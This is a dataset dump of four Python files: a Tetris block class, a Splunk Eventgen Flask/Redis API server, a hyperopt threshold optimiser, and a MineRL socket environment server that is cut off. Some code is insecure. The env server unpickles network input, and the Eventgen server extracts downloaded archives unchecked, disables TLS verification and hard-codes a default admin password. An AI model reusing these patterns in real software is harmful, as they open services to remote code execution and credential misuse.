source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
JBlock.py
|
import time
import threading
import config
from config import *
class JBlock:
def __init__(self):
self.cells = 4 # Number of cells occupied by the block
config.block_count += 1
config.item_id["blocks"][f"{config.block_count}"] = {} # Add a new key to dictionary to add block IDs
for n in range(self.cells - 1):
# Loop draws the bottom cells of the block on the top of the board
# Generate an ID for each cell occupied by the block
config.item_id["blocks"][f"{config.block_count}"][f"{n}"] = dpg.generate_uuid()
# Make a list of the initial cells occupied by the blocks
config.cells_occupied.append([3 + n, 18])
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3 + n, 19], pmax=[4 + n, 18],
parent=item_id["windows"]["tetris_board"],
id=config.item_id["blocks"][f"{config.block_count}"][f"{n}"])
# Draw the final cell on the top
# Generate an ID for the top cell occupied by the block
config.item_id["blocks"][f"{config.block_count}"]["3"] = dpg.generate_uuid()
# Add point to cells_occupied list
config.cells_occupied.append([3, 19])
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3, 20], pmax=[4, 19],
parent=item_id["windows"]["tetris_board"],
id=config.item_id["blocks"][f"{config.block_count}"]["3"])
# Update statistics
# Take the value shown, add 1 and set value
dpg.configure_item(item=item_id["displays"]["J_block_stat"],
text=int(dpg.get_item_configuration(item=item_id["displays"]["J_block_stat"])["text"]) + 1)
dpg.set_value(item=item_id["displays"]["Total_block_stat"],
value=int(dpg.get_value(item=item_id["displays"]["Total_block_stat"])) + 1)
def move_blockDispatcher(self):
# Function creates a new thread that controls the continuous movement of the new blocks
move_block_thread = threading.Thread(name="move block", target=self.move_block, args=(), daemon=True)
move_block_thread.start()
def move_block(self):
# Function controls the continuous downward movement of the blocks
config.block_moving_flag = 2 # Set to 2=JBlock. Block is moving
while True:
for n in range(self.cells):
config.cells_occupied[-1 - n][1] -= 1 # Shift the Y Coordinate down by 1 unit
if any(item in config.cells_occupied[-self.cells:] for item in config.cell_boundary) or \
any(item in config.cells_occupied[-self.cells:] for item in config.cells_occupied[:-self.cells]):
# Check if any cells have touched the wall or other blocks. If so, stop the movement
for n in range(self.cells):
config.cells_occupied[-1 - n][1] += 1 # Reset the Y coordinate
config.block_moving_flag = 0 # Block has stopped moving
return
for n in range(self.cells):
# Draw after all cells are updated
dpg.configure_item(item=config.item_id["blocks"][f"{config.block_count}"][f"{n}"],
pmin=[config.cells_occupied[-1 - n][0], config.cells_occupied[-1 - n][1] + 1],
pmax=[config.cells_occupied[-1 - n][0] + 1, config.cells_occupied[-1 - n][1]])
time.sleep(config.speed) # Wait at each cell
def draw_next_JBlock():
for n in range(3):
# Loop draws the complete block on the "next" board
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3 + n, 3], pmax=[4 + n, 2],
parent=item_id["windows"]["next_block_board"])
# Draw the final cell on the top
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[3, 4], pmax=[4, 3],
parent=item_id["windows"]["next_block_board"])
def draw_statistics_JBlock():
for n in range(3):
# Loop draws the complete block on the "next" board
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[1 + n, 1], pmax=[2 + n, 0],
parent=item_id["windows"]["statistics_window"])
# Draw the final cell on the top
# Draw the cell
dpg.draw_image(texture_tag=item_id["block_texture"]["J_block"], pmin=[1, 2], pmax=[2, 1],
parent=item_id["windows"]["statistics_window"])
dpg.draw_line(p1=[6.5, 1], p2=[7.5, 1], thickness=0.1, color=[168, 168, 168],
parent=item_id["windows"]["statistics_window"])
dpg.draw_text(pos=[8.5, 1.3], text="0", size=0.5, color=[168, 168, 168],
id=item_id["displays"]["J_block_stat"])
|
eventgen_server_api.py
|
import flask
from flask import Response, request
import socket
import json
import configparser
import os
import time
import zipfile
import tarfile
import glob
import shutil
import collections
import logging
import requests
import threading
from splunk_eventgen.eventgen_api_server import eventgen_core_object
INTERNAL_ERROR_RESPONSE = json.dumps({"message": "Internal Error Occurred"})
FILE_PATH = os.path.dirname(os.path.realpath(__file__))
DEFAULT_PATH = os.path.realpath(os.path.join(FILE_PATH, "..", "default"))
SAMPLE_DIR_PATH = os.path.realpath(os.path.join(FILE_PATH, "..", "serverSamples"))
class EventgenServerAPI:
def __init__(self, eventgen, redis_connector, host, mode='standalone'):
self.bp = self._create_blueprint()
self.eventgen = eventgen
self.logger = logging.getLogger('eventgen_server')
self.logger.info("Initialized the EventgenServerAPI Blueprint")
self.total_volume = 0.0
self.host = host
self.interval = 0.01
self.mode = mode
if self.mode != 'standalone':
self.redis_connector = redis_connector
self._channel_listener()
self.logger.info("Initialized the channel listener. Cluster mode ready.")
def get_blueprint(self):
return self.bp
def _channel_listener(self):
def start_listening(self):
while True:
message = self.redis_connector.pubsub.get_message()
if message and type(message.get('data')) == bytes:
data = json.loads(message.get('data'))
self.logger.info("Message Recieved {}".format(message['data']))
if data['target'] == 'all' or data['target'] == self.host:
thread = threading.Thread(target=self._delegate_jobs, args=(data.get('job'), data.get('request_method'), data.get('body'), data.get('message_uuid')))
thread.daemon = True
thread.start()
time.sleep(self.interval)
thread = threading.Thread(target=start_listening, args=(self,))
thread.daemon = True
thread.start()
def format_message(self, job, request_method, response, message_uuid):
return json.dumps({'job': job, 'request_method': request_method, 'response': response, 'host': self.host, 'message_uuid': message_uuid})
def _delegate_jobs(self, job, request_method, body, message_uuid):
if not job: return
else:
self.logger.info("Delegated {} {} {} {}".format(job, request_method, body, message_uuid))
if job == 'status':
response = self.get_status()
message = self.format_message('status', request_method, response=response, message_uuid=message_uuid)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, message)
elif job == 'conf':
if request_method == 'POST':
self.set_conf(body)
elif request_method == 'PUT':
self.edit_conf(body)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('conf', request_method, response=self.get_conf(), message_uuid=message_uuid))
elif job == 'bundle':
self.set_bundle(body.get("url", ''))
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('bundle', request_method, response=self.get_conf(), message_uuid=message_uuid))
elif job == 'setup':
self.clean_bundle_conf()
self.setup_http(body)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('setup', request_method, response=self.get_conf(), message_uuid=message_uuid))
elif job == 'volume':
if request_method == 'POST':
self.set_volume(body.get("perDayVolume", 0.0))
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('volume', request_method, response=self.get_volume(), message_uuid=message_uuid))
elif job == 'start':
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('start', request_method, response=self.start(), message_uuid=message_uuid))
elif job == 'stop':
message = {'message': 'Eventgen is stopping. Might take some time to terminate all processes.'}
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('stop', request_method, response=message, message_uuid=message_uuid))
self.stop(force_stop=True)
elif job == 'restart':
message = {'message': 'Eventgen is restarting. Might take some time to restart.'}
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('restart', request_method, response=message, message_uuid=message_uuid))
self.restart()
elif job == 'reset':
message = {'message': 'Eventgen is resetting. Might take some time to reset.'}
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, self.format_message('reset', request_method, response=message, message_uuid=message_uuid))
self.reset()
elif job == 'healthcheck':
response = self.healthcheck()
message = self.format_message('healthcheck', request_method, response=response, message_uuid=message_uuid)
self.redis_connector.message_connection.publish(self.redis_connector.controller_channel, message)
def _create_blueprint(self):
bp = flask.Blueprint('server_api', __name__)
@bp.route('/index', methods=['GET'])
def http_get_index():
return self.get_index()
@bp.route('/status', methods=['GET'])
def http_get_status():
try:
response = self.get_status()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/conf', methods=['GET', 'POST', 'PUT'])
def http_conf():
try:
if request.method == 'POST':
self.set_conf(request.get_json(force=True))
elif request.method == 'PUT':
self.edit_conf(request.get_json(force=True))
return Response(json.dumps(self.get_conf()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/volume', methods=['GET'])
def http_get_volume():
try:
response = self.get_volume()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/volume', methods=['POST'])
def http_post_volume():
try:
self.set_volume(request.get_json(force=True).get("perDayVolume", 0.0))
return Response(json.dumps(self.get_volume()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/start', methods=['POST'])
def http_post_start():
try:
response = self.start()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/stop', methods=['POST'])
def http_post_stop():
try:
force_stop = False
try:
force_stop = True
except:
force_stop = False
response = self.stop(force_stop = force_stop)
self.eventgen.refresh_eventgen_core_object()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/restart', methods=['POST'])
def http_post_restart():
try:
response = self.restart()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/reset', methods=['POST'])
def http_post_reset():
try:
response = self.reset()
return Response(json.dumps(response), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/bundle', methods=['POST'])
def http_post_bundle():
try:
self.set_bundle(request.get_json(force=True).get("url", ''))
self.clean_bundle_conf()
return Response(json.dumps(self.get_conf()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/setup', methods=['POST'])
def http_post_setup():
try:
self.stop(force_stop=True)
self.clean_bundle_conf()
self.setup_http(request.get_json(force=True))
return Response(json.dumps(self.get_conf()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
@bp.route('/healthcheck', methods=['GET'])
def http_get_healthcheck():
try:
return Response(json.dumps(self.healthcheck()), mimetype='application/json', status=200)
except Exception as e:
self.logger.error(e)
return Response(INTERNAL_ERROR_RESPONSE, mimetype='application/json', status=500)
return bp
def get_index(self):
home_page = '''*** Eventgen WSGI ***\nHost: {0}\nEventgen Status: {1}\nEventgen Config file exists: {2}\nEventgen Config file path: {3}\nTotal volume: {4}\nWorker Queue Status: {5}\nSample Queue Status: {6}\nOutput Queue Status: {7}\n'''
status = self.get_status()
eventgen_status = "running" if status["EVENTGEN_STATUS"] else "stopped"
host = status["EVENTGEN_HOST"]
configured = status["CONFIGURED"]
config_file = status["CONFIG_FILE"]
total_volume = status["TOTAL_VOLUME"]
worker_queue_status = status["QUEUE_STATUS"]["WORKER_QUEUE"]
sample_queue_status = status["QUEUE_STATUS"]["SAMPLE_QUEUE"]
output_queue_status = status["QUEUE_STATUS"]["OUTPUT_QUEUE"]
return home_page.format(host, eventgen_status, configured, config_file, total_volume, worker_queue_status,
sample_queue_status, output_queue_status)
def get_conf(self):
response = collections.OrderedDict()
if self.eventgen.configured:
config = configparser.RawConfigParser()
config.optionxform = str
config_path = self.eventgen.configfile
if os.path.isfile(config_path):
config.read(config_path)
for section in config.sections():
response[section] = collections.OrderedDict()
for k, v in config.items(section):
response[section][k] = v
return response
def set_conf(self, request_body):
config = configparser.RawConfigParser({}, collections.OrderedDict)
config.optionxform = str
for sample in request_body.items():
config.add_section(sample[0])
for pair in sample[1].items():
value = pair[1]
if type(value) == dict:
value = json.dumps(value)
config.set(sample[0], pair[0], str(value))
with open(eventgen_core_object.CUSTOM_CONFIG_PATH, 'w+') as conf_content:
config.write(conf_content)
self.eventgen.refresh_eventgen_core_object()
def edit_conf(self, request_body):
conf_dict = self.get_conf()
for stanza, kv_pairs in request_body.items():
for key, value in kv_pairs.items():
if stanza not in conf_dict:
conf_dict[stanza] = {}
if stanza == "global" and key == "index":
for stanza, kv_pairs in conf_dict.items():
conf_dict[stanza]["index"] = value
conf_dict[stanza][key] = value
self.set_conf(conf_dict)
def get_status(self):
response = dict()
if self.eventgen.eventgen_core_object.check_running():
status = 1 if not self.eventgen.eventgen_core_object.check_done() else 2 # 1 is running and 2 is done
else:
status = 0 # not start yet
response["EVENTGEN_STATUS"] = status
response["EVENTGEN_HOST"] = self.host
response["CONFIGURED"] = self.eventgen.configured
response["CONFIG_FILE"] = self.eventgen.configfile
response["TOTAL_VOLUME"] = self.total_volume
response["QUEUE_STATUS"] = {
'SAMPLE_QUEUE': {
'UNFINISHED_TASK': 'N/A',
'QUEUE_LENGTH': 'N/A'},
'OUTPUT_QUEUE': {
'UNFINISHED_TASK': 'N/A',
'QUEUE_LENGTH': 'N/A'},
'WORKER_QUEUE': {
'UNFINISHED_TASK': 'N/A',
'QUEUE_LENGTH': 'N/A'}
}
response['THROUGHPUT_STATUS'] = self.get_throughput()
if hasattr(self.eventgen.eventgen_core_object, "sampleQueue"):
response["QUEUE_STATUS"]['SAMPLE_QUEUE']['UNFINISHED_TASK'] = self.eventgen.eventgen_core_object.sampleQueue.unfinished_tasks
response["QUEUE_STATUS"]['SAMPLE_QUEUE']['QUEUE_LENGTH'] = self.eventgen.eventgen_core_object.sampleQueue.qsize()
if hasattr(self.eventgen.eventgen_core_object, "outputQueue"):
try:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['UNFINISHED_TASK'] = self.eventgen.eventgen_core_object.outputQueue.unfinished_tasks
except:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['UNFINISHED_TASK'] = "N/A"
try:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['QUEUE_LENGTH'] = self.eventgen.eventgen_core_object.outputQueue.qsize()
except:
response["QUEUE_STATUS"]['OUTPUT_QUEUE']['QUEUE_LENGTH'] = "N/A"
if hasattr(self.eventgen.eventgen_core_object, "workerQueue"):
try:
response["QUEUE_STATUS"]['WORKER_QUEUE']['UNFINISHED_TASK'] = self.eventgen.eventgen_core_object.workerQueue.unfinished_tasks
except:
response["QUEUE_STATUS"]['WORKER_QUEUE']['UNFINISHED_TASK'] = "N/A"
try:
response["QUEUE_STATUS"]['WORKER_QUEUE']['QUEUE_LENGTH'] = self.eventgen.eventgen_core_object.workerQueue.qsize()
except:
response["QUEUE_STATUS"]['WORKER_QUEUE']['QUEUE_LENGTH'] = "N/A"
return response
def get_throughput(self):
empty_throughput = {'TOTAL_VOLUME_MB': 0, 'TOTAL_COUNT': 0, 'THROUGHPUT_VOLUME_KB': 0, 'THROUGHPUT_COUNT': 0}
if hasattr(self.eventgen.eventgen_core_object, 'output_counters'):
total_volume = 0
total_count = 0
throughput_volume = 0
throughput_count = 0
for output_counter in self.eventgen.eventgen_core_object.output_counters:
total_volume += output_counter.total_output_volume
total_count += output_counter.total_output_count
throughput_volume += output_counter.throughput_volume
throughput_count += output_counter.throughput_count
return {
'TOTAL_VOLUME_MB': total_volume / (1024 * 1024),
'TOTAL_COUNT': total_count,
'THROUGHPUT_VOLUME_KB': throughput_volume / (1024),
'THROUGHPUT_COUNT': throughput_count}
else:
return empty_throughput
def get_volume(self):
response = dict()
config = self.get_conf()
total_volume = 0.0
volume_distribution = {}
for stanza in list(config.keys()):
if isinstance(config[stanza], dict) and "perDayVolume" in list(config[stanza].keys()):
total_volume += float(config[stanza]["perDayVolume"])
volume_distribution[stanza] = float(config[stanza]["perDayVolume"])
if total_volume:
self.total_volume = total_volume
response['perDayVolume'] = self.total_volume
response['volume_distribution'] = volume_distribution
return response
def set_volume(self, target_volume):
conf_dict = self.get_conf()
if self.get_volume()['perDayVolume'] != 0:
ratio = float(target_volume) / float(self.total_volume)
for stanza, kv_pair in conf_dict.items():
if isinstance(kv_pair, dict):
if '.*' not in stanza and "perDayVolume" in list(kv_pair.keys()):
conf_dict[stanza]["perDayVolume"] = round(float(conf_dict[stanza]["perDayVolume"]) * ratio, 2)
else:
# If there is no total_volume existing, divide the volume equally into stanzas
stanza_num = len(list(conf_dict.keys()))
if '.*' in conf_dict:
stanza_num -= 1
if 'global' in conf_dict:
stanza_num -= 1
divided_volume = float(target_volume) / stanza_num
for stanza, kv_pair in conf_dict.items():
if isinstance(kv_pair, dict) and stanza != 'global' and '.*' not in stanza:
conf_dict[stanza]["perDayVolume"] = divided_volume
self.set_conf(conf_dict)
self.total_volume = round(float(target_volume), 2)
def start(self):
response = {}
if not self.eventgen.configured:
response['message'] = "Eventgen is not configured."
elif self.eventgen.eventgen_core_object.check_running():
response['message'] = "Eventgen already started."
else:
self.eventgen.eventgen_core_object.start(join_after_start=False)
response['message'] = "Eventgen has successfully started."
return response
def stop(self, force_stop=False):
response = {}
if self.eventgen.eventgen_core_object.check_running():
try:
self.eventgen.eventgen_core_object.stop(force_stop=force_stop)
except:
pass
response['message'] = "Eventgen is stopped."
else:
response['message'] = "There is no Eventgen process running."
return response
def restart(self):
response = {}
if self.eventgen.eventgen_core_object.check_running():
self.reset()
self.start()
response['message'] = "Eventgen has successfully restarted."
else:
self.start()
response['message'] = "Eventgen was not running. Starting Eventgen."
return response
def reset(self):
response = {}
self.stop(force_stop=True)
time.sleep(0.1)
self.eventgen.refresh_eventgen_core_object()
self.get_volume()
response['message'] = "Eventgen has been reset."
return response
def healthcheck(self):
response = {}
if self.mode != 'standalone':
try:
self.redis_connector.pubsub.check_health()
response['message'] = "Connections are healthy"
except Exception as e:
self.logger.error("Connection to Redis failed: {}, re-registering".format(str(e)))
self.redis_connector.register_myself(hostname=self.host, role="server")
response['message'] = "Connections unhealthy - re-established connections"
else:
response['message'] = "Standalone {} is healthy".format(self.host)
return response
def set_bundle(self, url):
if not url:
return
bundle_dir = self.unarchive_bundle(self.download_bundle(url))
if os.path.isdir(os.path.join(bundle_dir, "samples")):
if not os.path.exists(SAMPLE_DIR_PATH):
os.makedirs(SAMPLE_DIR_PATH)
for file in glob.glob(os.path.join(bundle_dir, "samples", "*")):
shutil.copy(file, SAMPLE_DIR_PATH)
self.logger.info("Copied all samples to the sample directory.")
if os.path.isfile(os.path.join(bundle_dir, "default", "eventgen.conf")):
self.eventgen.configured = False
config = configparser.RawConfigParser()
config.optionxform = str
config.read(os.path.join(bundle_dir, "default", "eventgen.conf"))
config_dict = {s: collections.OrderedDict(config.items(s)) for s in config.sections()}
self.set_conf(config_dict)
self.eventgen.configured = True
self.logger.info("Configured Eventgen with the downloaded bundle.")
def download_bundle(self, url):
bundle_path = os.path.join(DEFAULT_PATH, "eg-bundle.tgz")
try:
os.remove(bundle_path)
shutil.rmtree(os.path.join(os.path.dirname(bundle_path), 'eg-bundle'))
except:
pass
r = requests.get(url, stream=True)
with open(bundle_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=None):
if chunk:
f.write(chunk)
r.close()
self.logger.info("Downloaded bundle to the path {}".format(bundle_path))
return bundle_path
def unarchive_bundle(self, path):
output = ''
if tarfile.is_tarfile(path):
tar = tarfile.open(path)
foldername = ''
for name in tar.getnames():
if '/' not in name:
foldername = name
break
output = os.path.join(os.path.dirname(path), os.path.commonprefix(tar.getnames()))
tar.extractall(path=os.path.dirname(path))
tar.close()
if foldername:
os.rename(os.path.join(os.path.dirname(path), foldername), os.path.join(os.path.dirname(path), 'eg-bundle'))
output = os.path.join(os.path.dirname(path), 'eg-bundle')
elif zipfile.is_zipfile(path):
zipf = zipfile.ZipFile(path)
for info in zipf.infolist():
old_file_name = info.filename
info.filename = "eg-bundle/" + info.filename
zipf.extract(info, os.path.dirname(path))
output = os.path.join(os.path.dirname(path), 'eg-bundle')
zipf.close()
else:
msg = "Unknown archive format!"
raise Exception(msg)
self.logger.info("Unarchived bundle to the path {}".format(path))
return output
def clean_bundle_conf(self):
conf_dict = self.get_conf()
if ".*" not in conf_dict:
conf_dict['.*'] = {}
# 1. Remove sampleDir from individual stanza and set a global sampleDir
# 2. Change token sample path to a local sample path
for stanza, kv_pair in conf_dict.items():
if stanza != ".*":
if 'sampleDir' in kv_pair:
del kv_pair['sampleDir']
for key, value in kv_pair.items():
if 'replacementType' in key and value in ['file', 'mvfile', 'seqfile']:
token_num = key[key.find('.')+1:key.rfind('.')]
if not token_num: continue
else:
existing_path = kv_pair['token.{}.replacement'.format(token_num)]
kv_pair['token.{}.replacement'.format(token_num)] = os.path.join(SAMPLE_DIR_PATH, existing_path[existing_path.rfind('/')+1:])
conf_dict['.*']['sampleDir'] = SAMPLE_DIR_PATH
self.set_conf(conf_dict)
def setup_http(self, data):
if data.get("servers"):
conf_dict = self.get_conf()
if 'global' not in conf_dict:
conf_dict['global'] = {}
for stanza, kv_pair in conf_dict.items():
if 'outputMode' in kv_pair:
del kv_pair['outputMode']
if 'httpeventServers' in kv_pair:
del kv_pair['httpeventServers']
conf_dict['global']['threading'] = 'process'
conf_dict['global']['httpeventMaxPayloadSize'] = '256000'
conf_dict['global']['outputMode'] = 'httpevent'
conf_dict['global']['httpeventServers'] = {"servers": data.get("servers")}
self.set_conf(conf_dict)
else:
# If hec_servers information doesn't exist, do service discovery
mode = data.get("mode", "roundrobin")
hostname_template = data.get("hostname_template", "idx{0}")
hosts = data.get("other_hosts", [])
protocol = data.get("protocol", "https")
key = data.get("key", "00000000-0000-0000-0000-000000000000")
key_name = data.get("key_name", "eventgen") + '_' + self.host
password = data.get("password", "Chang3d!")
hec_port = int(data.get("hec_port", 8088))
mgmt_port = int(data.get("mgmt_port", 8089))
new_key = bool(data.get("new_key", True))
def create_new_hec_key(hostname):
requests.post(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http/http".format(
hostname, mgmt_port), auth=("admin", password), data={"disabled": "0"}, verify=False)
requests.delete(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http/{2}".format(
hostname, mgmt_port, key_name), verify=False, auth=("admin", password))
requests.post(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http?output_mode=json".format(
hostname, mgmt_port), verify=False, auth=("admin", password), data={"name": key_name})
r = requests.post(
"https://{0}:{1}/servicesNS/admin/splunk_httpinput/data/inputs/http/{2}?output_mode=json".format(
hostname, mgmt_port, key_name), verify=False, auth=("admin", password))
return str(json.loads(r.text)["entry"][0]["content"]["token"])
self.discovered_servers = []
for host in hosts:
try:
formatted_hostname = socket.gethostbyname(host)
if new_key:
key = create_new_hec_key(formatted_hostname)
except (socket.gaierror, requests.ConnectionError):
self.logger.warning('failed to reach %s, skip...' % host)
continue
except (ValueError, KeyError):
self.logger.warning('failed to setup hec token for %s, skip...' % host)
continue
self.discovered_servers.append({"protocol": str(protocol), "address": str(formatted_hostname), "port": str(hec_port), "key": str(key)})
counter = 1
while True:
try:
formatted_hostname = socket.gethostbyname(hostname_template.format(counter))
if new_key:
key = create_new_hec_key(formatted_hostname)
self.discovered_servers.append({
"protocol": str(protocol), "address": str(formatted_hostname), "port": str(hec_port), "key":
str(key)})
counter += 1
except socket.gaierror:
break
conf_dict = self.get_conf()
if 'global' not in conf_dict:
conf_dict['global'] = {}
for stanza, kv_pair in conf_dict.items():
if 'outputMode' in kv_pair:
del kv_pair['outputMode']
if 'httpeventServers' in kv_pair:
del kv_pair['httpeventServers']
conf_dict['global']['threading'] = 'process'
conf_dict['global']['httpeventMaxPayloadSize'] = '256000'
conf_dict['global']['outputMode'] = 'httpevent'
conf_dict['global']['httpeventServers'] = {"servers": self.discovered_servers}
self.set_conf(conf_dict)
|
optimize_threshold.py
|
import EncoderFactory
from DatasetManager import DatasetManager
import pandas as pd
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.pipeline import FeatureUnion
import time
import os
import sys
from sys import argv
import pickle
import csv
from hyperopt import Trials, STATUS_OK, tpe, fmin, hp
import hyperopt
from multiprocessing import Process as Process
def calculate_cost(x, costs):
return costs[int(x['prediction']), int(x['actual'])](x)
def evaluate_model_cost(args):
conf_threshold = args['conf_threshold']
c_miss= args['c_miss']
c_action = args['c_action']
c_com = args['c_com']
costs = np.matrix([[lambda x: 0,
lambda x: c_miss],
[lambda x: c_action + c_com, # 0:1
lambda x: c_action + (x['prefix_nr'] - 1) / x['case_length'] * c_miss
]])
# trigger alarms according to conf_threshold
dt_final = pd.DataFrame()
unprocessed_case_ids = set(dt_preds.case_id.unique())
for nr_events in range(1, dt_preds.prefix_nr.max() + 1):
tmp = dt_preds[(dt_preds.case_id.isin(unprocessed_case_ids)) & (dt_preds.prefix_nr == nr_events)]
tmp = tmp[tmp.predicted_proba >= conf_threshold]
tmp["prediction"] = 1
dt_final = pd.concat([dt_final, tmp], axis=0)
unprocessed_case_ids = unprocessed_case_ids.difference(tmp.case_id)
tmp = dt_preds[(dt_preds.case_id.isin(unprocessed_case_ids)) & (dt_preds.prefix_nr == 1)]
tmp["prediction"] = 0
dt_final = pd.concat([dt_final, tmp], axis=0)
case_lengths = dt_preds.groupby("case_id").prefix_nr.max().reset_index()
case_lengths.columns = ["case_id", "case_length"]
dt_final = dt_final.merge(case_lengths)
cost = dt_final.apply(calculate_cost, costs=costs, axis=1).sum()
return {'loss': cost, 'status': STATUS_OK, 'model': dt_final}
def run_experiment(c_miss_weight,c_action_weight):
c_miss = c_miss_weight / (c_miss_weight + c_action_weight)
c_action = c_action_weight / (c_miss_weight + c_action_weight)
c_com = 2.0
space = {'conf_threshold': hp.uniform("conf_threshold", 0, 1),
'c_miss':c_miss,
'c_action':c_action,
'c_com':c_com}
trials = Trials()
best = fmin(evaluate_model_cost, space, algo=tpe.suggest, max_evals=50, trials=trials)
print(repr(best))
best_params = hyperopt.space_eval(space, best)
outfile = os.path.join(params_dir, "optimal_confs_%s_%s_%s_%s.pickle" % (
dataset_name, c_miss_weight, c_action_weight, c_postpone_weight))
print(outfile)
# write to file
with open(outfile, "wb") as fout:
pickle.dump(best_params, fout)
print('Preparing data...')
start = time.time()
dataset_name = argv[1]
preds_dir = argv[2]
params_dir = argv[3]
# create output directory
if not os.path.exists(os.path.join(params_dir)):
os.makedirs(os.path.join(params_dir))
# read the data
dataset_manager = DatasetManager(dataset_name)
# prepare the dataset
dt_preds = pd.read_csv(os.path.join(preds_dir, "preds_val_%s.csv" % dataset_name), sep=";")
print('Optimizing parameters...')
cost_weights = [(1,1), (2,1), (3,1), (5,1), (10,1), (20,1)]
c_postpone_weight = 0
processes = []
for c_miss_weight, c_action_weight in cost_weights:
p = Process(target=run_experiment,args=(c_miss_weight,c_action_weight))
p.start()
processes.append(p)
for p in processes:
p.join()
|
env_server.py
|
import socket
import sys
import traceback
import gym
import logging
import minerl
import struct
import argparse
import os
import tempfile
import fcntl
import getpass
from threading import Thread
try:
import cPickle as pickle
except ImportError:
import pickle
class EnvServer:
def __init__(self, handler, host: str = "127.0.0.1", port: int = 9999):
self.handler = handler
self.host = host
self.port = port
self.soc = None
def start_server(self):
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# SO_REUSEADDR flag tells the kernel to reuse a local socket in TIME_WAIT state,
# without waiting for its natural timeout to expire
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logging.info("Socket created")
try:
soc.bind((self.host, self.port))
except:
logging.error("Bind failed. Error : " + str(sys.exc_info()))
sys.exit()
soc.listen(5) # queue up to 5 requests
logging.info("Socket now listening")
self.soc = soc
def listen(self):
# infinite loop- do not reset for every requests
try:
while True:
connection, address = self.soc.accept()
ip, port = str(address[0]), str(address[1])
logging.info("Connected with " + ip + ":" + port)
try:
Thread(target=self.client_thread, args=(connection,)).start()
except:
logging.error("Thread did not start.")
traceback.print_exc()
finally:
self.soc.close()
def client_thread(self, connection):
is_active = True
client_address = connection.getpeername()
try:
while is_active:
client_input = receive_data(connection)
if type(client_input) is dict:
handler = client_input["type"]
if handler == "close":
send_data(connection, self.handler.message_dict[handler](client_address, client_input["data"]))
connection.close()
is_active = False
elif handler in self.handler.message_dict:
send_data(connection, self.handler.message_dict[handler](client_address, client_input["data"]))
else:
send_data(connection, Exception("invalid type"))
logging.error(Exception("Invalid type"))
else:
try:
send_data(connection, Exception("invalid message"))
except Exception:
break
finally:
self.handler.release_env(self.handler.env_register, client_address)
def receive_data(connection):
raw_msglen = recvall(connection, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
# Read the message data
message = recvall(connection, msglen)
decoded_input = pickle.loads(message, encoding="bytes")
return decoded_input
def recvall(sock, n):
# Helper function to recv n bytes or return None if EOF is hit
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def send_data(connection, data):
message = pickle.dumps(data, protocol=4)
message = struct.pack('>I', len(message)) + message
connection.sendall(message)
def gym_sync_create(env_string, thread_id):
lock_dir = os.path.join(tempfile.gettempdir(), getpass.getuser())
if not os.path.exists(lock_dir):
os.makedirs(lock_dir)
with open(os.path.join(lock_dir, "minecraft-{}.lock".format(thread_id)), "wb") as lock_file:
fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX)
try:
env = gym.make(env_string)
return env
finally:
fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN)
class Handler:
def __init__(self, env_name: str = "MineRLTreechop-v0", num_envs: int = 1):
self.message_dict = {
"make": self.handle_make,
"step": self.handle_step,
"reset": self.handle_reset,
"close": self.handle_close,
"version": self.handle_version
}
self.env_name = env_name
